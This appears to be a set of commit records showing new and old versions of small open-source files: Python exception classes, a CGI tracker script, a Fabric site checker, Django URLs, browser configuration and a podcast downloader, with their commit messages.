    Catching this error will catch both
    :exc:`~requests.exceptions.ConnectTimeout` and
    :exc:`~requests.exceptions.ReadTimeout` errors.
    """


class ConnectTimeout(ConnectionError, Timeout):
    """The request timed out while trying to connect to the remote server.

    Requests that produced this error are safe to retry.
    """


class ReadTimeout(Timeout):
    """The server did not send any data in the allotted amount of time."""


class URLRequired(RequestException):
    """A valid URL is required to make a request."""


class TooManyRedirects(RequestException):
    """Too many redirects."""


# The next three double as ValueError so callers can catch bad-URL
# conditions generically.
class MissingSchema(RequestException, ValueError):
    """The URL schema (e.g. http or https) is missing."""


class InvalidSchema(RequestException, ValueError):
    """See defaults.py for valid schemas."""


class InvalidURL(RequestException, ValueError):
    """ The URL provided was somehow invalid. """


class ChunkedEncodingError(RequestException):
    """The server declared chunked encoding but sent an invalid chunk."""


class ContentDecodingError(RequestException, BaseHTTPError):
    """Failed to decode response content"""


# Also a TypeError: re-consuming a consumed stream is an API-misuse error.
class StreamConsumedError(RequestException, TypeError):
    """The content for this response was already consumed"""
| # -*- coding: utf-8 -*-
"""
requests.exceptions
~~~~~~~~~~~~~~~~~~~
This module contains the set of Requests' exceptions.
"""
from .packages.urllib3.exceptions import HTTPError as BaseHTTPError
class RequestException(IOError):
"""There was an ambiguous exception that occurred while handling your
request."""
def __init__(self, *args, **kwargs):
"""
Initialize RequestException with `request` and `response` objects.
"""
response = kwargs.pop('response', None)
self.response = response
self.request = kwargs.pop('request', None)
if (response is not None and not self.request and
hasattr(response, 'request')):
self.request = self.response.request
super(RequestException, self).__init__(*args, **kwargs)
class HTTPError(RequestException):
"""An HTTP error occurred."""
class ConnectionError(RequestException):
"""A Connection error occurred."""
class ProxyError(ConnectionError):
"""A proxy error occurred."""
class SSLError(ConnectionError):
"""An SSL error occurred."""
class Timeout(RequestException):
"""The request timed out.
Catching this error will catch both
:exc:`~requests.exceptions.ConnectTimeout` and
:exc:`~requests.exceptions.ReadTimeout` errors.
"""
class ConnectTimeout(ConnectionError, Timeout):
"""The request timed out while trying to connect to the remote server.
Requests that produced this error are safe to retry.
"""
class ReadTimeout(Timeout):
"""The server did not send any data in the allotted amount of time."""
class URLRequired(RequestException):
"""A valid URL is required to make a request."""
class TooManyRedirects(RequestException):
"""Too many redirects."""
class MissingSchema(RequestException, ValueError):
"""The URL schema (e.g. http or https) is missing."""
class InvalidSchema(RequestException, ValueError):
"""See defaults.py for valid schemas."""
class InvalidURL(RequestException, ValueError):
""" The URL provided was somehow invalid. """
class ChunkedEncodingError(RequestException):
"""The server declared chunked encoding but sent an invalid chunk."""
class ContentDecodingError(RequestException, BaseHTTPError):
"""Failed to decode response content"""
# Doubly inherit from TypeError: re-consuming a consumed stream is an
# API-misuse error, and callers historically caught TypeError here.
class StreamConsumedError(RequestException, TypeError):
    """The content for this response was already consumed"""
| apache-2.0 | Python |
952b21499759ed727e2185261192e6839ed95221 | improve code for getting history from params | shimniok/rockblock,shimniok/rockblock,shimniok/rockblock | status.py | status.py | #!/usr/bin/env python
import math
import cgi
#import cgitb; cgitb.enable() # for troubleshooting
import json
import csv
import config
# CGI script (Python 2): emits the most recent tracker records as JSON.
print "Content-type: application/json"
print
result = [];
form = cgi.FieldStorage()
# `history` query parameter selects how many records to return.
# NOTE(review): bare `except:` also swallows KeyboardInterrupt/SystemExit;
# consider narrowing to (TypeError, ValueError).
try:
    maximum = int(form.getvalue("history"))
except:
    maximum = 1
# TODO: revise to use logfile and extended format
try:
    with open(config.db, 'rb') as f:
        entries = list(csv.reader(f))
    # if specified history is > length of records, use length
    maximum = min(maximum, len(entries))
    # calculate how many entries to skip
    skip = len(entries) - maximum
    # print number of entries specified by history param
    for e in entries:
        # Skip malformed/short rows.
        if len(e) < 8:
            continue
        if skip:
            skip -= 1
            continue
        # Column layout assumed: 0=time, 1=momsn, 2=imei, 7=lat, 8=lng,
        # 9=speed, 10=course, 11=text -- TODO confirm against the writer.
        result.append({
            'time': e[0],
            'momsn': e[1],
            'imei': e[2],
            'lat': e[7],
            'lng': e[8],
            'speed': e[9],
            'course': e[10],
            'text': e[11]
        })
finally:
    # Always emit JSON, even if reading the database failed part-way.
    print json.dumps(result, sort_keys=True, indent=4)
| #!/usr/bin/env python
import math
import cgi
#import cgitb; cgitb.enable() # for troubleshooting
import json
import csv
import config
print "Content-type: application/json"
print
result = [];
form = cgi.FieldStorage()
history = form.getvalue("history")
if history == None:
maximum = 1
else:
maximum = int(history)
# TODO: revise to use logfile and extended format
try:
with open(config.db, 'rb') as f:
entries = list(csv.reader(f))
# if specified history is > length of records, use length
maximum = min(maximum, len(entries))
# calculate how many entries to skip
skip = len(entries) - maximum
# print number of entries specified by history param
for e in entries:
if len(e) < 8:
continue
if skip:
skip -= 1
continue
result.append({
'time': e[0],
'momsn': e[1],
'imei': e[2],
'lat': e[7],
'lng': e[8],
'speed': e[9],
'course': e[10],
'text': e[11]
})
finally:
print json.dumps(result, sort_keys=True, indent=4)
| mit | Python |
a09c4bac6e65bb5847f0878822a23235d7f52d51 | Remove all index operations | jrasky/planetlabs-challenge | stocks.py | stocks.py | #!/usr/bin/env python
def find_profit(prices, window):
    """Return the best profit from buying at one price and selling at a
    later price at most `window` ticks after the buy.

    Scans once, tracking the index of the current minimum price inside
    the window (`pivot`) and the best candidate minimum after it
    (`next_pivot`), so the whole search is O(n).

    Bug fix: the original compared numbers against None (`pivot + 1 >
    next_pivot`, `price < next_price`), which only works under Python 2's
    arbitrary ordering (None sorts below every number) and raises
    TypeError on Python 3. The None cases are now explicit; behavior on
    Python 2 is unchanged.
    """
    pivot = None
    pivot_price = None
    next_pivot = None
    next_price = None
    profit = 0
    for i, price in enumerate(prices):
        if pivot is None or price < pivot_price:
            pivot = i
            pivot_price = price
            if next_pivot is None or pivot + 1 > next_pivot:
                next_pivot = pivot + 1
                next_price = None
        if i == next_pivot:
            next_price = price
        # Only consider i as the fallback minimum when a candidate price
        # is known (Python 2 treated `price < None` as False).
        if pivot != i and (next_pivot is None or
                           (next_price is not None and price < next_price)):
            next_pivot = i
            next_price = price
        if i - pivot == window:
            # The buy point fell out of the window: advance to the best
            # later minimum seen so far.
            # NOTE(review): assumes next_price has been populated by the
            # time the window expires -- confirm for adversarial inputs.
            pivot = next_pivot
            pivot_price = next_price
            next_pivot += 1
            next_price = None
        profit = max(profit, price - pivot_price)
    return profit
def main():
    """Exercise find_profit on a few hand-checked price series."""
    # Parenthesized single-argument print is valid on both Python 2 and 3
    # (the original Py2-only print statements broke under Python 3).
    print(find_profit([1.0, 2.0, 3.0, 1.0, 3.0, 4.0], 5))
    print(find_profit([7.0, 5.0, 6.0, 4.0, 5.0, 3.0, 4.0, 2.0, 3.0, 1.0], 5))
    print(find_profit([4.0, 3.0, 2.0, 4.0, 3.0, 1.0, 1.1, 1.2, 1.3, 1.4], 5))


if __name__ == "__main__":
    main()
| #!/usr/bin/env python
def find_profit(prices, window):
pivot = None
next_pivot = None
profit = 0
for i, price in enumerate(prices):
if pivot is None or price < prices[pivot]:
pivot = i
next_pivot = max(next_pivot, pivot + 1)
if pivot != i and (next_pivot is None or price < prices[next_pivot]):
next_pivot = i
if i - pivot == window:
pivot = next_pivot
next_pivot += 1
profit = max(profit, price - prices[pivot])
return profit
def main():
print find_profit([1.0, 2.0, 3.0, 1.0, 3.0, 4.0], 5)
print find_profit([7.0, 5.0, 6.0, 4.0, 5.0, 3.0, 4.0, 2.0, 3.0, 1.0], 5)
print find_profit([4.0, 3.0, 2.0, 4.0, 3.0, 1.0, 1.1, 1.2, 1.3, 3.4], 5)
if __name__ == "__main__":
main()
| mit | Python |
af074f6c1cae0521cdcb135f9413a5b9e1808d44 | fix broken method enqueue | fedusia/python | data_structs/queue.py | data_structs/queue.py | #!/usr/bin/env python3
''' Linear queue '''
class Queue:
def __init__(self, items=[]):
self.items = items
def is_Empty(self):
return self.items == []
def size(self):
return len(self.items)
def enqueue(self, item):
self.items.insert(0, item)
def dequeue(self):
return self.items.pop()
def main():
pass
if __name__ == '__main__':
main()
| #!/usr/bin/env python3
''' Linear queue '''
class Queue:
def __init__(self, items=[]):
self.items = items
def is_Empty(self):
return self.items == []
def size(self):
return len(self.items)
def enqueue(self, item):
self.Queue.insert(0, item)
def dequeue(self):
return self.items.pop()
def main():
pass
if __name__ == '__main__':
main()
| apache-2.0 | Python |
e2cba02550dfbe8628daf024a2a35c0dffb234e9 | Handle different environments, for automation (I4). | rroart/aether,rroart/aether,rroart/aether,rroart/aether,rroart/aether | python/cli/request.py | python/cli/request.py | import requests
import os
aport = os.environ.get('MYAPORT')
if aport is None:
aport = "80"
aport = "23456"
ahost = os.environ.get('MYAHOST')
if ahost is None:
ahost = "localhost"
url1 = 'http://' + ahost + ':' + aport + '/'
#headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
#headers={'Content-type':'application/json', 'Accept':'application/json'}
headers={'Content-Type' : 'application/json;charset=utf-8'}
def request1(param, webpath):
return requests.post(url1 + webpath, json=param, headers=headers)
def request0(data):
return requests.post(url, data='', headers=headers)
#return requests.post(url, data=json.dumps(data), headers=headers)
| import requests
import os
aport = os.environ.get('MYAPORT')
if aport is None:
aport = "80"
aport = "23456"
url1 = 'http://localhost:' + aport + '/'
url2 = 'http://localhost:' + aport + '/action/improvesimulateinvest'
url3 = 'http://localhost:' + aport + '/action/autosimulateinvest'
url4 = 'http://localhost:' + aport + '/action/improveautosimulateinvest'
#headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
#headers={'Content-type':'application/json', 'Accept':'application/json'}
headers={'Content-Type' : 'application/json;charset=utf-8'}
def request1(param, webpath):
return requests.post(url1 + webpath, json=param, headers=headers)
def request2(market, data):
return requests.post(url2 + '/market/' + str(market), json=data, headers=headers)
def request3(market, data):
return requests.post(url3 + '/market/' + str(market), json=data, headers=headers)
def request4(market, data):
return requests.post(url4 + '/market/' + str(market), json=data, headers=headers)
def request0(data):
return requests.post(url, data='', headers=headers)
#return requests.post(url, data=json.dumps(data), headers=headers)
| agpl-3.0 | Python |
de2831df77928523bb58aeb8faa96fbf3d56d4f5 | use renamed package | rdeits/iris,rdeits/iris,rdeits/iris,rdeits/iris | python/irispy/iris.py | python/irispy/iris.py | from __future__ import division
import numpy as np
from irispy.hyperplanes import compute_obstacle_planes
from irispy.mosek_ellipsoid.lownerjohn_ellipsoid import lownerjohn_inner
def inflate_region(obstacle_pts, A_bounds, b_bounds, start, require_containment=False):
A_bounds = np.array(A_bounds)
b_bounds = np.array(b_bounds)
d = np.array(start)
dim = A_bounds.shape[1]
C = 0.01 * np.eye(dim)
best_vol = -1
results = {'p_history': [], 'e_history': []}
iter = 1
while True:
A, b, infeas_start = compute_obstacle_planes(obstacle_pts, C, d)
A = np.vstack((A, A_bounds))
b = np.hstack((b, b_bounds))
if require_containment:
if np.all(A.dot(start) <= b) or iter == 1 or infeas_start:
results['p_history'].append({'A': A, 'b': b})
else:
A = results['p_history'][-1]['A']
b = results['p_history'][-1]['b']
print "Breaking early because start point is no longer contained in polytope"
break
else:
results['p_history'].append({'A': A, 'b': b})
C, d = lownerjohn_inner(A, b)
C = np.array(C)
d = np.array(d)
vol = np.linalg.det(C)
results['e_history'].append({'C': C, 'd': d})
if abs(vol - best_vol) / best_vol < 2e-2:
break
best_vol = vol
iter += 1
return A, b, C, d, results
| from __future__ import division
import numpy as np
from irispy.hyperplanes import compute_obstacle_planes
from irispy.mosek.lownerjohn_ellipsoid import lownerjohn_inner
def inflate_region(obstacle_pts, A_bounds, b_bounds, start, require_containment=False):
A_bounds = np.array(A_bounds)
b_bounds = np.array(b_bounds)
d = np.array(start)
dim = A_bounds.shape[1]
C = 0.01 * np.eye(dim)
best_vol = -1
results = {'p_history': [], 'e_history': []}
iter = 1
while True:
A, b, infeas_start = compute_obstacle_planes(obstacle_pts, C, d)
A = np.vstack((A, A_bounds))
b = np.hstack((b, b_bounds))
if require_containment:
if np.all(A.dot(start) <= b) or iter == 1 or infeas_start:
results['p_history'].append({'A': A, 'b': b})
else:
A = results['p_history'][-1]['A']
b = results['p_history'][-1]['b']
print "Breaking early because start point is no longer contained in polytope"
break
else:
results['p_history'].append({'A': A, 'b': b})
C, d = lownerjohn_inner(A, b)
C = np.array(C)
d = np.array(d)
vol = np.linalg.det(C)
results['e_history'].append({'C': C, 'd': d})
if abs(vol - best_vol) / best_vol < 2e-2:
break
best_vol = vol
iter += 1
return A, b, C, d, results
| bsd-2-clause | Python |
c15b51b93d21673e67975ffcd9a071aacb197975 | Add `app_name` to urls.py for Django v2 | pinax/pinax-invitations,eldarion/kaleo | pinax/invitations/urls.py | pinax/invitations/urls.py | from django.conf.urls import url
from .views import (
AddToAllView,
AddToUserView,
InviteView,
TopOffAllView,
InviteStatView,
TopOffUserView
)
app_name = "pinax_invitations"
urlpatterns = [
url(r"^invite/$", InviteView.as_view(), name="invite"),
url(r"^invite-stat/(?P<pk>\d+)/$", InviteStatView.as_view(), name="invite_stat"),
url(r"^topoff/$", TopOffAllView.as_view(), name="topoff_all"),
url(r"^topoff/(?P<pk>\d+)/$", TopOffUserView.as_view(), name="topoff_user"),
url(r"^addto/$", AddToAllView.as_view(), name="addto_all"),
url(r"^addto/(?P<pk>\d+)/$", AddToUserView.as_view(), name="addto_user"),
]
| from django.conf.urls import url
from .views import (
AddToAllView,
AddToUserView,
InviteView,
TopOffAllView,
InviteStatView,
TopOffUserView
)
urlpatterns = [
url(r"^invite/$", InviteView.as_view(), name="invite"),
url(r"^invite-stat/(?P<pk>\d+)/$", InviteStatView.as_view(), name="invite_stat"),
url(r"^topoff/$", TopOffAllView.as_view(), name="topoff_all"),
url(r"^topoff/(?P<pk>\d+)/$", TopOffUserView.as_view(), name="topoff_user"),
url(r"^addto/$", AddToAllView.as_view(), name="addto_all"),
url(r"^addto/(?P<pk>\d+)/$", AddToUserView.as_view(), name="addto_user"),
]
| unknown | Python |
059780cb468042327caf7ff55f29702f3de4d98f | Change formatting. | Aegis8/utility-fabfiles | checksite/fabfile.py | checksite/fabfile.py | ## Check if a website is up from two different locations, eg. localhost and a remote host.
## Used to confirm if an alert is valid or not.
## Normal curl result is displayed from each host.
## Usage: run fab checksite
## Import Fabric's API module
from fabric.api import *
##Get required info
##User can be hard-coded or asked for by using prompt()
env.user = prompt('Username: ')
#env.user = ""
##Keyfile location
#env.key_filename = "/path/to/key"
##Remote host can be hard-coded or asked by using prompt()
env.host = prompt('Please specify remote host: ')
#env.host = ""
##Site to be checked can be hard-coded or asked by using prompt()
env.site = prompt('Please specify the site to check: ')
#env.site = ""
@hosts("%s" % (env.host))
def remotecheck():
""" Run the check on the remote host """
run("curl -I %s" % (env.site))
def localcheck():
""" Run the check on localhost """
local("curl -I %s" % (env.site))
def checksite():
## Remotecheck
execute(remotecheck)
## Local check
execute(localcheck) | ## Check if a website is up from two different locations, eg. localhost and a remote host.
## Used to confirm if an alert is valid or not.
## Normal curl result is displayed from each host.
## Usage: run fab checksite
## Import Fabric's API module
from fabric.api import *
##Get required info
##User can be hard-coded or asked for by using prompt()
#env.user = ""
env.user = prompt('Username: ')
##Keyfile location
#env.key_filename = "/path/to/key"
##Remote host can be hard-coded or asked by using prompt()
env.host = prompt('Please specify remote host: ')
#env.host = ""
##Site to be checked can be hard-coded or asked by using prompt()
env.site = prompt('Please specify the site to check: ')
@hosts("%s" % (env.host))
def remotecheck():
""" Run the check on the remote host """
run("curl -I %s" % (env.site))
def localcheck():
""" Run the check on localhost """
local("curl -I %s" % (env.site))
def checksite():
## Remotecheck
execute(remotecheck)
## Local check
execute(localcheck) | mit | Python |
5edb070308e2597047f82ecb44cb84b314b488c9 | Use blank string instead of None as default origin | crodjer/qotr,sbuss/qotr,crodjer/qotr,sbuss/qotr,rmoorman/qotr,curtiszimmerman/qotr,curtiszimmerman/qotr,sbuss/qotr,rmoorman/qotr,crodjer/qotr,sbuss/qotr,curtiszimmerman/qotr,rmoorman/qotr,crodjer/qotr,curtiszimmerman/qotr,rmoorman/qotr | qotr/handlers/base.py | qotr/handlers/base.py | import logging
from fnmatch import fnmatch
from tornado import web
from qotr.config import config
L = logging.getLogger(__name__)
ALLOWED_ORIGINS = [o.strip() for o in config.allowed_origin.split(',')]
def set_cors_headers(handler):
'''
Given a handler, set the CORS headers on it.
'''
origin = handler.request.headers.get('Origin', '')
L.debug('Setting CORS headers for: %s based on %s', origin,
ALLOWED_ORIGINS)
if origin in ALLOWED_ORIGINS or any(fnmatch(origin, o)
for o in ALLOWED_ORIGINS):
handler.set_header("Access-Control-Allow-Origin", origin)
handler.set_header("Access-Control-Allow-Headers", "Content-Type")
# pylint: disable=W0223
class Base(web.RequestHandler):
'''
A base request handler.
'''
def prepare(self):
protocol = self.request.headers.get('x-forwarded-proto')
if config.redirect_to_https and \
self.request.method == 'GET' and \
protocol == 'http':
self.redirect('https://{}{}'.format(
self.request.host.split(':')[0], self.request.path
), permanent=True)
| import logging
from fnmatch import fnmatch
from tornado import web
from qotr.config import config
L = logging.getLogger(__name__)
ALLOWED_ORIGINS = [o.strip() for o in config.allowed_origin.split(',')]
def set_cors_headers(handler):
'''
Given a handler, set the CORS headers on it.
'''
origin = handler.request.headers.get('Origin')
L.debug('Setting CORS headers for: %s based on %s', origin,
ALLOWED_ORIGINS)
if origin in ALLOWED_ORIGINS or any(fnmatch(origin, o)
for o in ALLOWED_ORIGINS):
handler.set_header("Access-Control-Allow-Origin", origin)
handler.set_header("Access-Control-Allow-Headers", "Content-Type")
# pylint: disable=W0223
class Base(web.RequestHandler):
'''
A base request handler.
'''
def prepare(self):
protocol = self.request.headers.get('x-forwarded-proto')
if config.redirect_to_https and \
self.request.method == 'GET' and \
protocol == 'http':
self.redirect('https://{}{}'.format(
self.request.host.split(':')[0], self.request.path
), permanent=True)
| agpl-3.0 | Python |
1fdf1f4693ac17e41fce64b2d708102903bdf0ab | Support for magnet uris. | bittorrent/btc | btc/btc_add.py | btc/btc_add.py | import argparse
import time
import hashlib
import os
from . import btclient
from . import utils
from .bencode import bdecode, bencode
from .btc import encoder, decoder, client, error
_description = 'add torrent to client'
def main():
parser = argparse.ArgumentParser()
parser.add_argument('value')
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument('-u', '--url', default=False, action='store_true')
group.add_argument('-f', '--file', default=False, action='store_true')
args = parser.parse_args()
if not args.url and not args.file:
args.file = os.path.exists(args.value)
args.url = not args.file
if args.url:
#if given URI starts with "magnet:?" then it's probably a magnet link
if args.value.startswith('magnet:?'):
#magnets with bittorrent info hash have "xt=urn:btih:"
if args.value.find("xt=urn:btih")>0:
client.add_torrent_url(args.value)
#TODO: Display confirmation about magnet having been added
#returning, because decoding torrent will report invalid file
return
else:
args.value = utils.httpize(args.value)
try:
torrent = utils.get(args.value, utf8=False)
except utils.HTTPError:
error('invalid url: %s' % args.value)
client.add_torrent_url(args.value)
elif args.file:
if not os.path.exists(args.value):
error('no such file: %s' % args.value)
try:
f = open(args.value, 'rb')
torrent = f.read()
f.close()
except:
error('reading file: %s' % args.value)
client.add_torrent_file(args.value)
added = None
try:
decoded = bdecode(torrent)
encoded = bencode(decoded[b'info'])
except:
error('invalid torrent file')
h = hashlib.sha1(encoded).hexdigest().upper()
while not added:
l = client.list_torrents()
for t in l:
if t['hash'] == h:
added = t
break
time.sleep(1)
print(encoder.encode([added]))
if __name__ == '__main__':
main()
| import argparse
import time
import hashlib
import os
from . import btclient
from . import utils
from .bencode import bdecode, bencode
from .btc import encoder, decoder, client, error
_description = 'add torrent to client'
def main():
parser = argparse.ArgumentParser()
parser.add_argument('value')
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument('-u', '--url', default=False, action='store_true')
group.add_argument('-f', '--file', default=False, action='store_true')
args = parser.parse_args()
if not args.url and not args.file:
args.file = os.path.exists(args.value)
args.url = not args.file
if args.url:
args.value = utils.httpize(args.value)
try:
torrent = utils.get(args.value, utf8=False)
except utils.HTTPError:
error('invalid url: %s' % args.value)
client.add_torrent_url(args.value)
elif args.file:
if not os.path.exists(args.value):
error('no such file: %s' % args.value)
try:
f = open(args.value, 'rb')
torrent = f.read()
f.close()
except:
error('reading file: %s' % args.value)
client.add_torrent_file(args.value)
added = None
try:
decoded = bdecode(torrent)
encoded = bencode(decoded[b'info'])
except:
error('invalid torrent file')
h = hashlib.sha1(encoded).hexdigest().upper()
while not added:
l = client.list_torrents()
for t in l:
if t['hash'] == h:
added = t
break
time.sleep(1)
print(encoder.encode([added]))
if __name__ == '__main__':
main()
| mit | Python |
26205e73a7fc9651cbbd36c911bdd834f377d335 | Add some more searchengines | The-Compiler/dotfiles,The-Compiler/dotfiles,The-Compiler/dotfiles | qutebrowser/config.py | qutebrowser/config.py | config.load_autoconfig()
c.tabs.background = True
c.new_instance_open_target = 'window'
c.downloads.position = 'bottom'
c.spellcheck.languages = ['en-US']
config.bind(',ce', 'config-edit')
config.bind(',p', 'config-cycle -p content.plugins ;; reload')
config.bind(',rta', 'open {url}top/?sort=top&t=all')
config.bind(',rtv', 'spawn termite -e "rtv {url}"')
config.bind(',c', 'spawn -d chromium {url}')
css = '~/code/solarized-everything-css/css/solarized-all-sites-dark.css'
config.bind(',n', f'config-cycle content.user_stylesheets {css} ""')
c.url.searchengines['rfc'] = 'https://tools.ietf.org/html/rfc{}'
c.url.searchengines['pypi'] = 'https://pypi.org/project/{}/'
c.url.searchengines['qtbug'] = 'https://bugreports.qt.io/browse/QTBUG-{}'
c.url.searchengines['qb'] = 'https://github.com/The-Compiler/qutebrowser/issues/{}'
c.url.searchengines['btc'] = 'https://www.blockchain.com/btc/address/{}'
c.url.searchengines['http'] = 'https://httpstatuses.com/{}'
c.url.searchengines['duden'] = 'https://www.duden.de/suchen/dudenonline/{}'
c.url.searchengines['dictcc'] = 'https://www.dict.cc/?s={}'
#c.url.searchengines['maps'] = 'https://www.google.com/maps?q=%s'
c.fonts.tabs = '8pt monospace'
c.fonts.statusbar = '8pt monospace'
c.fonts.web.family.fantasy = 'Arial'
c.search.incremental = False
c.editor.command = ['emacs', '{}']
#c.qt.args = ['ppapi-widevine-path=/usr/lib/qt/plugins/ppapi/libwidevinecdmadapter.so']
c.content.javascript.enabled = False
config.source('perdomain.py')
| config.load_autoconfig()
c.tabs.background = True
c.new_instance_open_target = 'window'
c.downloads.position = 'bottom'
c.spellcheck.languages = ['en-US']
config.bind(',ce', 'config-edit')
config.bind(',p', 'config-cycle -p content.plugins ;; reload')
config.bind(',rta', 'open {url}top/?sort=top&t=all')
config.bind(',rtv', 'spawn termite -e "rtv {url}"')
config.bind(',c', 'spawn -d chromium {url}')
css = '~/code/solarized-everything-css/css/solarized-all-sites-dark.css'
config.bind(',n', f'config-cycle content.user_stylesheets {css} ""')
c.url.searchengines['rfc'] = 'https://tools.ietf.org/html/rfc{}'
c.url.searchengines['pypi'] = 'https://pypi.org/project/{}/'
c.url.searchengines['qtbug'] = 'https://bugreports.qt.io/browse/QTBUG-{}'
c.url.searchengines['qb'] = 'https://github.com/The-Compiler/qutebrowser/issues/{}'
c.url.searchengines['btc'] = 'https://www.blockchain.com/btc/address/{}'
#c.url.searchengines['maps'] = 'https://www.google.com/maps?q=%s'
c.fonts.tabs = '8pt monospace'
c.fonts.statusbar = '8pt monospace'
c.fonts.web.family.fantasy = 'Arial'
c.search.incremental = False
c.editor.command = ['emacs', '{}']
#c.qt.args = ['ppapi-widevine-path=/usr/lib/qt/plugins/ppapi/libwidevinecdmadapter.so']
c.content.javascript.enabled = False
config.source('perdomain.py')
| mit | Python |
b0631bdf88a6c86c0dd1c2bffe65b5bb7dbd9d5d | Bump version | dstufft/recliner | recliner/__about__.py | recliner/__about__.py | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
]
__title__ = "recliner"
__summary__ = ""
__uri__ = "https://github.com/crateio/recliner/"
__version__ = "0.2"
__author__ = "Donald Stufft"
__email__ = "donald.stufft@gmail.com"
__license__ = "Simplified BSD"
__copyright__ = "Copyright 2012 Donald Stufft"
| from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
]
__title__ = "recliner"
__summary__ = ""
__uri__ = "https://github.com/crateio/recliner/"
__version__ = "0.1"
__author__ = "Donald Stufft"
__email__ = "donald.stufft@gmail.com"
__license__ = "Simplified BSD"
__copyright__ = "Copyright 2012 Donald Stufft"
| bsd-2-clause | Python |
c88e18d722fbcc5692010a2e4d672657994a13a4 | Add System Checks for requirements | fdroidtravis/repomaker,fdroidtravis/repomaker,fdroidtravis/repomaker,fdroidtravis/repomaker | repomaker/__init__.py | repomaker/__init__.py | import os
import sys
from django.core.checks import Error, register
from fdroidserver import common
from fdroidserver.exception import FDroidException
# The name of the default user. Please DO NOT CHANGE
DEFAULT_USER_NAME = 'user'
def runserver():
execute([sys.argv[0], 'migrate']) # TODO move into package hook?
if len(sys.argv) <= 1 or sys.argv[1] != 'runserver':
sys.argv = sys.argv[:1] + ['runserver'] + sys.argv[1:]
execute(sys.argv)
def process_tasks():
if len(sys.argv) <= 1 or sys.argv[1] != 'process_tasks':
sys.argv = sys.argv[:1] + ['process_tasks'] + sys.argv[1:]
execute(sys.argv)
def execute(params):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "repomaker.settings_desktop")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
# create DATA_DIR if it doesn't exist
from django.conf import settings
if not os.path.isdir(settings.DATA_DIR):
os.makedirs(settings.DATA_DIR)
# execute pending command
execute_from_command_line(params)
@register()
def requirements_check(app_configs, **kwargs): # pylint: disable=unused-argument
errors = []
config = {}
common.fill_config_defaults(config)
common.config = config
if 'keytool' not in config:
errors.append(
Error(
'Could not find `keytool` program.',
hint='This program usually comes with Java. Try to install JRE. '
'On Debian-based system you can try to run '
'`apt install openjdk-8-jre-headless`.',
)
)
if 'jarsigner' not in config and not common.set_command_in_config('apksigner'):
errors.append(
Error(
'Could not find `jarsigner` or `apksigner`. At least one of them is required.',
hint='Please install the missing tool. On Debian-based systems you can try to run '
'`apt install apksigner`.',
)
)
try:
common.SdkToolsPopen(['aapt', 'version'], output=False)
except FDroidException:
errors.append(
Error(
'Could not find `aapt` program.',
hint='This program can be found in the Android SDK. '
'On Debian-based systems you can also try to run `apt install aapt` '
'to install it.',
)
)
return errors
| import os
import sys
# The name of the default user. Please DO NOT CHANGE
DEFAULT_USER_NAME = 'user'
def runserver():
execute([sys.argv[0], 'migrate']) # TODO move into package hook?
if len(sys.argv) <= 1 or sys.argv[1] != 'runserver':
sys.argv = sys.argv[:1] + ['runserver'] + sys.argv[1:]
execute(sys.argv)
def process_tasks():
if len(sys.argv) <= 1 or sys.argv[1] != 'process_tasks':
sys.argv = sys.argv[:1] + ['process_tasks'] + sys.argv[1:]
execute(sys.argv)
def execute(params):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "repomaker.settings_desktop")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
# create DATA_DIR if it doesn't exist
from django.conf import settings
if not os.path.isdir(settings.DATA_DIR):
os.makedirs(settings.DATA_DIR)
# execute pending command
execute_from_command_line(params)
| agpl-3.0 | Python |
389f41b66aa83d802c88fc6205e6a697fafd77a5 | add docopt and an option to specify destination dir for media files | rsalmond/headline_news_podcasts,rsalmond/headline_news_podcasts | grabber.py | grabber.py | """
A very simple podcast grabber
Usage:
grabber.py [options]
Options:
--help
--dest=<location> Where to put downloaded files, default is CWD
"""
import feedparser
import requests
from docopt import docopt
import os
def dload(download_dir, url, status=True):
""" I use this code snippet so often i should submit a pr to requests """
tmp = url.split('/')
filename = tmp[len(tmp) - 1]
if status:
print 'Downloading {0} to {1}/{2} ...'.format(url, download_dir, filename)
response = requests.get(url, stream=True)
with open(os.path.join(download_dir, filename), 'wb') as f:
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
f.flush()
def get_latest(feed):
feed = feedparser.parse(feed)
if len(feed['items']) > 0:
if 'links' in feed['items'][0]:
for link in feed['items'][0]['links']:
if 'type' in link and 'href' in link:
if 'audio' in link['type']:
dload(link['href'])
return
print 'Err: no media found'
if __name__ == '__main__':
arguments = docopt(__doc__, version="Simple Podcast Grabber 0.1")
dest_dir = arguments['--dest'] or '.'
statics = ['http://wsdownload.bbc.co.uk/worldservice/css/32mp3/latest/bbcnewssummary.mp3']
feeds = ['http://www.nhk.or.jp/rj/podcast/rss/english.xml',
'http://www.cbc.ca/podcasting/includes/wr.xml',
'http://www.npr.org/rss/podcast.php?id=500005']
for feed in feeds:
get_latest(dest_dir, feed)
for static in statics:
dload(dest_dir, static)
| import feedparser
import requests
import os
working_dir = './working'
def dload(url):
tmp = url.split('/')
filename = tmp[len(tmp) - 1]
response = requests.get(url, stream=True)
with open(os.path.join(working_dir, filename), 'wb') as f:
for chunk in response.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
def get_latest(feed):
feed = feedparser.parse(feed)
if len(feed['items']) > 0:
#from pprint import pprint
#pprint(feed['items'][0])
if 'links' in feed['items'][0]:
for link in feed['items'][0]['links']:
